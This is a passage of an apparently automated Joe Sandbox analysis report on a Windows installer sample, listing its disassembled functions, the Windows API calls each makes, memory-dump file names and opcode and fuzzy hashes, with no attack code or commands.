                                                                                                                        • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                        • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                                                        Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                        • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                                                        • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                        • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                                                        Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                        • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                                                        • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                        • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                                                        Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                        • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                                                        • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                        • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                        Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                        • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                                                        • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                        • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                                                        Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                          • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                          • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 334405425-0
                                                                                                                        • Opcode ID: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                                                                                                                        • Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
                                                                                                                        • Opcode Fuzzy Hash: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                                                                                                                        • Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D
                                                                                                                        Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree
                                                                                                                        • String ID: Call
                                                                                                                        • API String ID: 3394109436-1824292864
                                                                                                                        • Opcode ID: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                                                                                                                        • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                                                                                        • Opcode Fuzzy Hash: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                                                                                                                        • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                                                                                        Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                          • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        • lstrlenW.KERNEL32 ref: 00402344
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1486964399-0
                                                                                                                        • Opcode ID: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                                                        • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                                                                                        • Opcode Fuzzy Hash: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                                                        • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                                                                                        Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 397863658-0
                                                                                                                        • Opcode ID: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                                                        • Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
                                                                                                                        • Opcode Fuzzy Hash: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                                                        • Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                                                        Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3356406503-0
                                                                                                                        • Opcode ID: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                                                        • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                                                                                                                        • Opcode Fuzzy Hash: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                                                        • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                                                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                        • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                        • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                        • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                        Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2831762973-0
                                                                                                                        • Opcode ID: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                                                        • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                                                                                                                        • Opcode Fuzzy Hash: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                                                        • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                                                                                        Function 00405A75 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                                                        • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                        • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                        • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                                                        Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
